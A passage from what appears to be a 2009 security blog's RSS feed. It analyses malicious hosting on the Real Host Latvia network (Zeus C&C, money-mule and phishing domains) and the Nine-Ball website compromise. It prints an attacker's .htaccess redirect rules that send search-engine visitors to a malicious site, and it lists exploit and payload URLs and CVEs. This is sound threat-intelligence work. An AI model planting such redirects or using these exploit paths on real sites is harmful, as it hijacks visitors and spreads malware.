<table style="border-collapse: collapse; width: 463pt;" border="0" cellspacing="0" cellpadding="0" width="616">
<col style="width: 48pt;" width="64"></col>
<col style="width: 78pt;" width="104"></col>
<col style="width: 149pt;" width="198"></col>
<col style="width: 110pt;" width="146"></col>
<col style="width: 78pt;" width="104"></col>
<tbody>
<tr style="height: 12.75pt;" height="17">
<td style="height: 12.75pt; width: 48pt;" width="64" height="17">Date</td>
<td style="width: 78pt;" width="104">IP</td>
<td style="width: 149pt;" width="198">Domain</td>
<td style="width: 110pt;" width="146">URL</td>
<td style="width: 78pt;" width="104">Purpose</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17" align="right">5/6/2009</td>
<td>213.182.197.230</td>
<td>update.dom11z.cn</td>
<td>/</td>
<td>Multiple Exploits</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17" align="right">6/2/2009</td>
<td>213.182.197.227</td>
<td>test.corbsc.com</td>
<td>/splt/getpdf.php</td>
<td>Multiple Exploits</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17" align="right">6/4/2009</td>
<td>213.182.197.229</td>
<td>2k90.cn</td>
<td>/2/include/spl.php</td>
<td>Multiple Exploits</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17" align="right">6/5/2009</td>
<td>213.182.197.229</td>
<td>2k90.cn</td>
<td>/2/include/spl.php</td>
<td>Multiple Exploits</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17" align="right">6/10/2009</td>
<td>213.182.197.237</td>
<td>downloadoemsoftware.com</td>
<td>/exempl/include/spl.php</td>
<td>Multiple Exploits</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17" align="right">6/15/2009</td>
<td>213.182.197.237</td>
<td>downloadoemsoftware.com</td>
<td>/exempl/include/spl.php</td>
<td>Multiple Exploits</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17" align="right">7/10/2009</td>
<td>213.182.197.237</td>
<td>noplit.ws</td>
<td>/exempl/include/spl.php</td>
<td>Multiple Exploits</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17" align="right">7/10/2009</td>
<td>213.182.197.229</td>
<td>businessconsulting312.com</td>
<td>/bus_trf/1/pdf.php</td>
<td>Multiple Exploits</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17" align="right">7/10/2009</td>
<td>213.182.197.229</td>
<td>businessconsulting312.com</td>
<td>/bus_trf/1/pdf.php</td>
<td>Multiple Exploits</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17" align="right">5/6/2009</td>
<td>213.182.197.23</td>
<td>lieliteautobody.cn</td>
<td>/load.php</td>
<td>Payloads</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17" align="right">5/6/2009</td>
<td>213.182.197.23</td>
<td>lieliteautobody.cn</td>
<td>/load.php</td>
<td>Payloads</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17" align="right">6/2/2009</td>
<td>213.182.197.227</td>
<td>test.corbsc.com</td>
<td>/splt/getexe.php</td>
<td>Payloads</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17" align="right">6/6/2009</td>
<td>213.182.197.5</td>
<td>virus-detect-soft.com</td>
<td>/antivirus.exe</td>
<td>Payloads</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17" align="right">6/6/2009</td>
<td>213.182.197.5</td>
<td>virus-detect-soft.com</td>
<td>/antivirus.exe</td>
<td>Payloads</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17" align="right">6/10/2009</td>
<td>213.182.197.237</td>
<td>downloadoemsoftware.com</td>
<td>/exempl/load.php</td>
<td>Payloads</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17" align="right">7/18/2009</td>
<td>213.182.197.237</td>
<td>5fgh.ws</td>
<td>/expli/update.php</td>
<td>Payloads</td>
</tr>
</tbody>
</table>
<p>A little manual investigation led me to the following:</p>
<table style="border-collapse: collapse; width: 415pt;" border="0" cellspacing="0" cellpadding="0" width="552">
<col style="width: 78pt;" width="104"></col>
<col style="width: 149pt;" width="198"></col>
<col style="width: 110pt;" width="146"></col>
<col style="width: 78pt;" width="104"></col>
<tbody>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt; width: 78pt;" width="104" height="17">IP</td>
<td class="xl24" style="width: 149pt;" width="198">Domain</td>
<td class="xl24" style="width: 110pt;" width="146">Purpose</td>
<td class="xl24" style="width: 78pt;" width="104">More Information</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17">213.182.197.229</td>
<td class="xl24">yourgoogleanalytics.us</td>
<td class="xl24">Money Mule Recruiting<span> </span></td>
<td class="xl24"><a href="http://forums.layonara.com/just-fun/233792-oh-those-wacky-scam-artists.html" target="_blank">Link</a></td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17">213.182.197.229</td>
<td class="xl24">barwellsgroup.cn</td>
<td class="xl24">Money Mule Recruiting<span> </span></td>
<td class="xl24">Related to above</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl25" style="height: 12.75pt;" height="17">213.182.197.249</td>
<td class="xl24">Vikd3jj-3.com</td>
<td class="xl24">Malware</td>
<td class="xl24"></td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl25" style="height: 12.75pt;" height="17">213.182.197.251</td>
<td class="xl24">2k90.cn</td>
<td class="xl24">malware</td>
<td class="xl24"></td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl25" style="height: 12.75pt;" height="17">213.182.197.13</td>
<td class="xl24">Mac-videos.com</td>
<td class="xl24">Mac Trojan</td>
<td class="xl24"><a href="http://www.macfixitforums.com/ubbthreads.php/topics/474209/2/Google_Hijacked" target="_blank">Link</a></td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17">213.182.197.236</td>
<td class="xl24">71speed.info</td>
<td class="xl24" colspan="2">Leads to Banking Trojan &#8211;   Silent Banker &amp; Spambot</td>
</tr>
<tr style="height: 15pt;" height="20">
<td class="xl26" style="height: 15pt;" height="20">213.182.197.8</td>
<td class="xl26">bestxvids.info</td>
<td class="xl24">zlob</td>
<td class="xl24"><a href="http://myitforum.com/cs2/blogs/cmosby/archive/2008/06/17/malicious-doorways-redirecting-to-malware-dancho-danchev-s-blog-mind-streams-of-information-security-knowledge.aspx" target="_blank">Link</a></td>
</tr>
<tr style="height: 15pt;" height="20">
<td class="xl26" style="height: 15pt;" height="20">213.182.197.249</td>
<td class="xl26">traffic-searches.cn</td>
<td class="xl26">botnet C&amp;C</td>
<td class="xl24"><a href="http://www.malwareurl.com/listing.php?domain=traffic-searches.cn" target="_blank">Link</a></td>
</tr>
<tr style="height: 15pt;" height="20">
<td class="xl26" style="height: 15pt;" height="20">213.182.197.237</td>
<td class="xl26">1gigabayt.com</td>
<td class="xl24">Zeus C&amp;C</td>
<td class="xl24"><a href="https://zeustracker.abuse.ch/monitor.php?host=1gigabayt.com" target="_blank">Link</a></td>
</tr>
<tr style="height: 15pt;" height="20">
<td class="xl26" style="height: 15pt;" height="20">213.182.197.14</td>
<td class="xl26">iframepartners.com</td>
<td class="xl24">iframe sellers</td>
<td></td>
</tr>
<tr style="height: 15pt;" height="20">
<td class="xl26" style="height: 15pt;" height="20"><span> </span>213.182.197.228</td>
<td class="xl26">Chlenopopik.com</td>
<td class="xl24">Zeus C&amp;C</td>
<td><a href="https://zeustracker.abuse.ch/monitor.php?host=chlenopopik.com" target="_blank">Link</a></td>
</tr>
<tr style="height: 15pt;" height="20">
<td class="xl26" style="height: 15pt;" height="20">213.182.197.14</td>
<td class="xl26">Megavipsite.cn</td>
<td>malware</td>
<td><a href="http://www.threatexpert.com/report.aspx?md5=d49779060bc9f04140d3a22ffe555951" target="_blank">Link</a></td>
</tr>
<tr style="height: 15pt;" height="20">
<td class="xl26" style="height: 15pt;" height="20">213.182.197.20</td>
<td class="xl26">Traffcount.cn</td>
<td>malware</td>
<td><a href="http://www.honeynet.cz/domains/malicious.txt" target="_blank">Link</a></td>
</tr>
<tr style="height: 15pt;" height="20">
<td class="xl26" style="height: 15pt;" height="20">213.182.197.229</td>
<td class="xl26">Newskyag.com</td>
<td>Money Mule Recruiting<span> </span></td>
<td><a href="http://answers.yahoo.com/question/index?qid=20070912090147AAqz16y" target="_blank">Link</a></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20"></td>
<td></td>
<td>Zeus C&amp;C</td>
<td><a href="https://zeustracker.abuse.ch/monitor.php?host=newskyag.com" target="_blank">Link</a></td>
</tr>
<tr style="height: 15pt;" height="20">
<td class="xl26" style="height: 15pt;" height="20">213.182.197.235</td>
<td class="xl26">Traffic-exchange.ru</td>
<td>Part of iframe redirection service</td>
<td><a href="http://www.islandcrisis.net/2009/05/mygenerim-redirecting-spy-site-from-facebook/" target="_blank">Link</a></td>
</tr>
<tr style="height: 15pt;" height="20">
<td class="xl26" style="height: 15pt;" height="20">213.182.197.10</td>
<td class="xl26">vlkontacte.ru</td>
<td colspan="2">Russian Social Network Phish</td>
</tr>
<tr style="height: 15pt;" height="20">
<td class="xl26" style="height: 15pt;" height="20">213.182.197.251</td>
<td class="xl26">Botnet.su</td>
<td>Zeus C&amp;C</td>
<td><a href="https://zeustracker.abuse.ch/monitor.php?host=botnet.su" target="_blank">Link</a></td>
</tr>
</tbody>
</table>
<p>The domain I found most amusing was botnet.su, the attackers clearly aren&#8217;t trying to hide their motives on this one! This domain was previously used by the RBN along with NewskyAG and others. More on this link can be found at hostexploit.com.</p>
<p>Zeus seems to be one of the most common threats being hosted from Real Host&#8217;s network. According to <a title="top 10 botnets" href="http://www.networkworld.com/news/2009/072209-botnets.html" target="_blank">recent information</a> released by Damballa, Zeus is the #1 botnet in the US with an estimated 3.6 million PCs compromised.</p>
<p>To begin, let&#8217;s look at the money mule sites the Barwells Group and NewskyAG, here is an excerpt from the link included above:</p>
<p>BarwellsGroup</p>
<p>&#8220;During the trial period (1 month), you will be paid 2000 USD per month<br />
while  working  on  average  3  hours  per day, Monday-Friday, plus 5<br />
commission from every transactions or task received and processed. The<br />
salary  will  be  sent  in  the form of wire transfer directly to your<br />
account.  After  the  trial  period your base pay salary will go up to<br />
3,500USD per month, plus 5 commission.&#8221;</p>
<p>Clearly this is a money mule recruitment program. Sounds pretty good for 3 hours work per day, maybe I should quit my day job!</p>
<p>NewskyAG</p>
<p>Not only does this domain operate a money mule scam, it also ran a Zeus C&amp;C server. What is scary is that people actually fall prey to this scheme as shown by this quote from yahoo answers:</p>
<p>Q: &#8220;Anyone ever heard of a company called NewSky Ag?&#8221;</p>
<p>A: &#8220;Yes I work for them from home and so far everything is ok but I&#8217;ve only been doing it about 2 months so if you have any more ? please let me know&#8221;</p>
<p>Next we have a phish for a Russian social networking site</p>
<p><a href="http://www.martinsecurity.net/wp-content/uploads/2009/07/phish.png"></a><a href="http://www.martinsecurity.net/wp-content/uploads/2009/07/phish2.png"><img class="alignnone size-medium wp-image-388" title="phish2" src="http://www.martinsecurity.net/wp-content/uploads/2009/07/phish2-300x281.png" alt="phish2" width="300" height="281" /></a></p>
<p>Lastly lets look at iframepartners.com, the site is currently down however information is still available. The site pays malicious web admins to put iframes on their compromised websites. A colleague of mine was kind enough to translate the text from Russian (thanks Alex!). It reads:</p>
<p class="MsoNormal" style="margin-left: 54pt; text-indent: -18pt;"><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;"><span>1.<span style="font-family: Times New Roman; font-size: xx-small;"><span style="font-family: 'Times New Roman'; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span></span></span><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;">A partner pays for iframe traffic,  we accept only us, gb, it, au, and it will be in average from $1 to $20 for 1K  depending on traffic quality</span></span></p>
<p class="MsoNormal" style="margin-left: 54pt; text-indent: -18pt;"><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;"><span>2.<span style="font-family: Times New Roman; font-size: xx-small;"><span style="font-family: 'Times New Roman'; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span></span></span><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;">We accept only ads that generate  more that 50K USA  traffic</span></span></p>
<p class="MsoNormal" style="margin-left: 54pt; text-indent: -18pt;"><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;"><span>3.<span style="font-family: Times New Roman; font-size: xx-small;"><span style="font-family: 'Times New Roman'; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span></span></span><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;">You are prohibited to install  anything else with our iframe</span></span></p>
<p class="MsoNormal" style="margin-left: 54pt; text-indent: -18pt;"><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;"><span>4.<span style="font-family: Times New Roman; font-size: xx-small;"><span style="font-family: 'Times New Roman'; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span></span></span><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;">Adult traffic is not  welcomed</span></span></p>
<p class="MsoNormal" style="margin-left: 54pt; text-indent: -18pt;"><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;"><span>5.<span style="font-family: Times New Roman; font-size: xx-small;"><span style="font-family: 'Times New Roman'; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span></span></span><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;">An account will be deleted without  payout in case of detection of spam or worm traffic</span></span></p>
<p class="MsoNormal" style="margin-left: 54pt; text-indent: -18pt;"><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;"><span>6.<span style="font-family: Times New Roman; font-size: xx-small;"><span style="font-family: 'Times New Roman'; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span></span></span><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;">We have been deleting accounts that  are not active for few days</span></span></p>
<p class="MsoNormal" style="margin-left: 54pt; text-indent: -18pt;"><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;"><span>7.<span style="font-family: Times New Roman; font-size: xx-small;"><span style="font-family: 'Times New Roman'; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span></span></span><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;">Cheaters and hit-boters, please  don’t waste our time, look for other places</span></span></p>
<p class="MsoNormal" style="margin-left: 54pt; text-indent: -18pt;"><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;"><span>8.<span style="font-family: Times New Roman; font-size: xx-small;"><span style="font-family: 'Times New Roman'; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span></span></span><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;">Payout twice a month, in the  beginning and in the middle of month<br />
Use XXX XXXXXX to contact  us</span></span></p>
<p>Notice how adult sites, worms and spam traffic is not allowed? This is probably due to the fact that they are very noisy and easily spotted by security professionals.</p>
<p>This leads to another  site called installing.cc. This site pays for installing malware onto compromised PCs.</p>
<p><a href="http://www.martinsecurity.net/wp-content/uploads/2009/07/installing.png"></a><a href="http://www.martinsecurity.net/wp-content/uploads/2009/07/installing1.png"><img class="alignnone size-medium wp-image-397" title="installing.cc" src="http://www.martinsecurity.net/wp-content/uploads/2009/07/installing1-260x300.png" alt="installing.cc" width="260" height="300" /></a></p>
<p>Another interesting hit comes up from a design company called web-alfa.com. They designed an eye catching flash banner advertisement for the attackers.</p>
<p><a href="http://www.martinsecurity.net/wp-content/uploads/2009/07/advert1.png"><img class="alignnone size-medium wp-image-398" title="real host advertisment" src="http://www.martinsecurity.net/wp-content/uploads/2009/07/advert1-300x296.png" alt="real host advertisment" width="300" height="296" /></a></p>
<p><a href="http://www.martinsecurity.net/wp-content/uploads/2009/07/advert.png"></a><a href="http://www.martinsecurity.net/wp-content/uploads/2009/07/advert1.png"><img class="alignnone size-medium wp-image-398" style="-moz-binding: url(chrome://global/content/bindings/general.xml#asdfzxcv);" title="advert1" src="http://www.martinsecurity.net/wp-content/uploads/2009/07/advert1-300x296.png" alt="advert1" width="300" height="296" /></a></p>
<p>The slides in the flash movie say:</p>
<p class="MsoNormal" style="margin-left: 36pt;"><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;">Long-live  substitution,</span></span></p>
<p class="MsoNormal" style="margin-left: 36pt;"><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;">And software  sale,</span></span></p>
<p class="MsoNormal" style="margin-left: 36pt;"><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;">Referral  system,</span></span></p>
<p class="MsoNormal" style="margin-left: 36pt;"><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;">And other life  enjoyments</span></span></p>
<p class="MsoNormal" style="margin-left: 36pt;"><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;">For invitation and detailed  information contact us via XXX XXXXXX</span></span></p>
<p>Clearly Real Host Ltd is hosting major cybercrime activity as a vast number of IPs in their space host malicious content. Several of the domains hosted with them  were used by the former RBN. Real Host represents  a major threat to individuals, business and the safety of the Internet ecosystem.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.martinsecurity.net/2009/07/31/real-host-latvia-rbn-resurgence-or-clone/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Nine-Ball followup now with video! Part 2</title>
		<link>http://www.martinsecurity.net/2009/07/29/nine-ball-followup-now-with-video-part-2/</link>
		<comments>http://www.martinsecurity.net/2009/07/29/nine-ball-followup-now-with-video-part-2/#comments</comments>
		<pubDate>Wed, 29 Jul 2009 23:01:35 +0000</pubDate>
		<dc:creator>martinse</dc:creator>
				<category><![CDATA[Malware Binaries (exe/dll)]]></category>
		<category><![CDATA[Malware scripts and other formats]]></category>
		<category><![CDATA[Reverse Engineering]]></category>
		<category><![CDATA[gumblar]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[malzilla]]></category>
		<category><![CDATA[nineball]]></category>
		<category><![CDATA[silentbanker]]></category>
		<category><![CDATA[tedroo]]></category>

		<guid isPermaLink="false">http://www.martinsecurity.net/?p=371</guid>
		<description><![CDATA[As a follow up to my previous post, here is the next video depicting the second portion of the attack. For URLs, Virustotal results, etc refer back to Part 1. All analysis is conducted with Malzilla. www.youtube.com/watch?v=DNx9iMcRAQg To give you some additional insight into the attack, I am also able to share the contents of [...]]]></description>
			<content:encoded><![CDATA[<p>As a follow up to my previous post, here is the next video depicting the second portion of the attack. For URLs, Virustotal results, etc refer back to <a href="http://www.martinsecurity.net/2009/07/28/nine-ball-followup-part-1/" target="_blank">Part 1</a>. All analysis is conducted with Malzilla.</p>
<p><span class="youtube">
<object width="480" height="295">
<param name="movie" value="http://www.youtube.com/v/DNx9iMcRAQg?color1=d6d6d6&amp;color2=f0f0f0&amp;border=0&amp;fs=1&amp;hl=en&amp;autoplay=0&amp;showinfo=0&amp;iv_load_policy=3&amp;showsearch=0&amp;rel=1&amp;hd=1" />
<param name="allowFullScreen" value="true" />
<param name="allowscriptaccess" value="always">
<embed src="http://www.youtube.com/v/DNx9iMcRAQg?color1=d6d6d6&amp;color2=f0f0f0&amp;border=0&amp;fs=1&amp;hl=en&amp;autoplay=0&amp;showinfo=0&amp;iv_load_policy=3&amp;showsearch=0&amp;rel=1&amp;hd=1" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="480" height="295"></embed>
</object>
</span><p><a href="http://www.youtube.com/watch?v=DNx9iMcRAQg&fmt=18">www.youtube.com/watch?v=DNx9iMcRAQg</a></p></p>
<p>To give you some additional insight into the attack, I am also able to share the contents of a hacked server&#8217;s .htaccess file. The miscreants upload this file to automatically redirect visitors to a site under their control.</p>
<p>These lines will redirect all requests for 400,401,403,404 and 500 pages to ake.kz, the attacker controlled site.</p>
<p>ErrorDocument 400 http://ake.kz/in.cgi?8<br />
ErrorDocument 401 http://ake.kz/in.cgi?8<br />
ErrorDocument 403 http://ake.kz/in.cgi?8<br />
ErrorDocument 404 http://ake.kz/in.cgi?8<br />
ErrorDocument 500 http://ake.kz/in.cgi?8</p>
<p>The following entries check to see if a user has been referred to the compromised website by a search engine. If they have, they will be automatically forwarded on to the attacker&#8217;s site, ake.kz</p>
<p>RewriteEngine On<br />
RewriteCond %{HTTP_REFERER} .*google.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*ask.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*excite.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*msn.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*aol.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*goto.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*search.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*bing.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*dogpile.*<br />
RewriteRule ^(.*)$ http://ake.kz/in.cgi?7 [R=301,L]</p>
]]></content:encoded>
			<wfw:commentRss>http://www.martinsecurity.net/2009/07/29/nine-ball-followup-now-with-video-part-2/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Nine-Ball followup now with video! Part 1</title>
		<link>http://www.martinsecurity.net/2009/07/28/nine-ball-followup-part-1/</link>
		<comments>http://www.martinsecurity.net/2009/07/28/nine-ball-followup-part-1/#comments</comments>
		<pubDate>Tue, 28 Jul 2009 22:24:07 +0000</pubDate>
		<dc:creator>martinse</dc:creator>
				<category><![CDATA[Malware Binaries (exe/dll)]]></category>
		<category><![CDATA[Malware scripts and other formats]]></category>
		<category><![CDATA[Reverse Engineering]]></category>
		<category><![CDATA[banking trojan]]></category>
		<category><![CDATA[gumblar]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[malzilla]]></category>
		<category><![CDATA[nineball]]></category>
		<category><![CDATA[silentbanker]]></category>
		<category><![CDATA[spambot]]></category>

		<guid isPermaLink="false">http://www.martinsecurity.net/?p=353</guid>
		<description><![CDATA[A reader was gracious enough to share some information with me on the events surrounding the compromise of a website of his. The site was compromised via stolen FTP credentials which has been a technique employed by major Internet threats such as Gumblar and Nine-ball recently. This will be a two part post. Lets take [...]]]></description>
			<content:encoded><![CDATA[<p>A reader was gracious enough to share some information with me on the events surrounding the compromise of a website of his. The site was compromised via stolen FTP credentials which has been a technique  employed by major Internet threats such as Gumblar and Nine-ball recently. This will be a two part post.</p>
<p>Lets take a look at what happens to the victim webserver after it gets compromised and the malware involved. To make this post more interesting I&#8217;ve decided to deliver my analysis via video! Rather than the standard nerve grating rock music that people tend to add to videos like this I have opted for my genre of choice, electronic <img src='http://www.martinsecurity.net/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> . I&#8217;ve included virus total results, domains involved, etc at the end of the post.</p>
<p>Sit back, relax and enjoy the ride.</p>
<p><span class="youtube">
<object width="480" height="295">
<param name="movie" value="http://www.youtube.com/v/9HdA1lC2PWM?color1=d6d6d6&amp;color2=f0f0f0&amp;border=0&amp;fs=1&amp;hl=en&amp;autoplay=0&amp;showinfo=0&amp;iv_load_policy=3&amp;showsearch=0&amp;rel=1&amp;hd=1" />
<param name="allowFullScreen" value="true" />
<param name="allowscriptaccess" value="always">
<embed src="http://www.youtube.com/v/9HdA1lC2PWM?color1=d6d6d6&amp;color2=f0f0f0&amp;border=0&amp;fs=1&amp;hl=en&amp;autoplay=0&amp;showinfo=0&amp;iv_load_policy=3&amp;showsearch=0&amp;rel=1&amp;hd=1" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="480" height="295"></embed>
</object>
</span><p><a href="http://www.youtube.com/watch?v=9HdA1lC2PWM&fmt=18">www.youtube.com/watch?v=9HdA1lC2PWM</a></p></p>
<p>Domains / URLs involved:</p>
<p>71speed.info<br />
xbx.tw/in.cgi?6<br />
xbx.tw/in.cgi?3<br />
zyejanag.cn/rf/<br />
fvuligir.cn/s/in.cgi?11<br />
84.244.138.58/ts/in.cgi?chtr&amp;5f9d90<br />
esli.tw/load.php?e=1<br />
esli.tw/2/index.php<br />
esli.tw/show.php?s=18f8bc6e98</p>
<p>Exploits Used:</p>
<p>MDAC -- MS06-014<br />
Adobe Acroat -- CVE-2008-2992 &amp; CVE-2009-0927<br />
Adobe Flash Player (not sure which one)<br />
Microsoft DirectShow &amp; Office Web Components zero days<br />
Microsoft Snapshot Viewer MS08-041</p>
<p><a title="virustotal" href="http://www.virustotal.com/analisis/24c8ecc77dff561aaff74b1e4f7aed70aac6ef5c15fa4bbdf0e7000b0c0dadbf-1248735684" target="_blank">Virustotal Payload 1</a> &amp; <a title="threatexpert" href="http://www.threatexpert.com/report.aspx?md5=bd7c8e3151af1236035c1d7c22b78347" target="_blank">ThreatExpert Payload 1</a> -- SilentBanker -- Banking Trojan</p>
<p><a title="virustotal" href="http://www.virustotal.com/analisis/9c49899330c50b0a5fa709e70a8e73948cfd307881b9525256dfb800cdb86a30-1248813790" target="_blank">Virustotal Payload 2</a> &amp; <a title="threatexpert tedroo" href="http://www.threatexpert.com/report.aspx?md5=354f64c8daa3d12421cfb9f358b1843a" target="_blank">ThreatExpert Payload 2</a> -- Tedroo -- SpamBot</p>
<p><a title="wepawet" href="http://wepawet.cs.ucsb.edu/view.php?hash=4a1845cee23563ea96cdb367e491d668&amp;t=1248737159&amp;type=js" target="_blank">Wepawet PDF exploit</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.martinsecurity.net/2009/07/28/nine-ball-followup-part-1/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>One Click Hosting Spreads Banking Trojan</title>
		<link>http://www.martinsecurity.net/2009/07/02/one-click-hosting-spreads-banking-trojan/</link>
		<comments>http://www.martinsecurity.net/2009/07/02/one-click-hosting-spreads-banking-trojan/#comments</comments>
		<pubDate>Thu, 02 Jul 2009 23:59:02 +0000</pubDate>
		<dc:creator>martinse</dc:creator>
				<category><![CDATA[Intrusion Detection]]></category>
		<category><![CDATA[Malware Binaries (exe/dll)]]></category>
		<category><![CDATA[banker]]></category>
		<category><![CDATA[banking trojan]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[spam]]></category>

		<guid isPermaLink="false">http://www.martinsecurity.net/?p=342</guid>
		<description><![CDATA[While this is not totally new, I only recently came across my first event involving a one click host serving  malware. What is one click hosting? These are providers which you have probably heard of before such as RapidShare, Megaupload, yousendit and many many more. Wikipedia has a listing of many of them. These providers [...]]]></description>
			<content:encoded><![CDATA[<p>While this is not totally new, I only recently came across my first event involving a one click host serving  malware. What is one click hosting? These are providers which you have probably heard of before such as RapidShare, Megaupload, yousendit and many many more. Wikipedia has <a href="http://en.wikipedia.org/wiki/File_hosting_service" target="_blank">a listing</a> of many of them. These providers allow you to share files  via HTTP for free or a small fee for premium service.</p>
<p>In the last few weeks (beginning June 17th), a particular OCH (one click host) hotlinkfiles.com began serving up malware. The host uses AV according to a March 25th, 2008 post on their website:</p>
<p>&#8220;Today we introduce a new feature of virus scanning on all uploaded files. This is part of our service to protect you from downloading any virus. The feature is seamlessly integrated into Hotlinkfiles.com, our anti-virus software will automatically perform a scan on all uploaded files and will reject any infected file.&#8221;</p>
<p>The malware being served must be going undetected by whatever AV hotlinkfiles.com is using. Here is what is being served:</p>
<table style="border-collapse: collapse; width: 307pt;" border="0" cellspacing="0" cellpadding="0" width="409">
<col style="width: 116pt;" width="154"></col>
